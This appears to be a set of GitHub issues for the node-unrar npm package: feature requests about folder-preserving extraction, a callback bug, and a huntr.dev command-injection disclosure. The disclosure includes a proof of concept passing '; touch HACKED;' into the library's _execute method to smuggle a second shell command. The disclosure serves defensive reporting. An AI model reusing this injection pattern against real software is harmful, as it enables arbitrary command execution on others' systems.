Would you mind publishing the newest changes(escaping commands) to npm?

If you expand a RAR file which contains folders, those folders are not preserved in the final output.
Running "unrar e m.rar" at the terminal mimics this behaviour.
Running "unrar x m.rar" expands the file while preserving the folder structure, however.

Perhaps you can use your options object to allow the caller to decide whether to use "e" or "x" as the command to use with unrar?

I am passing arguments into node-unrar as instructed, and it creates an 'app folder even if it doesn't extract anything into it.

I'll try to figure out a possible solution, but I wanted to open up an issue in hopes of a resolution.

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Vulnerability Description

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/scopsy/node-unrar/blob/master/lib/index.js#L24

Steps To Reproduce:

1. Create the following PoC file:

// poc.js
var Unrar = require('node-unrar');
var rar = new Unrar('/path/to/file.rar');
rar._execute([], '; touch HACKED;', function(){});

2. Check there aren't files called HACKED
3. Execute the following commands in another terminal:

npm i node-unrar # Install affected module
node poc.js #  Run the PoC

4. Recheck the files: now HACKED has been created

Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

extract returns early if _execute fails instead of calling the passed cb
https://github.com/scopsy/node-unrar/blob/master/lib/index.js#L17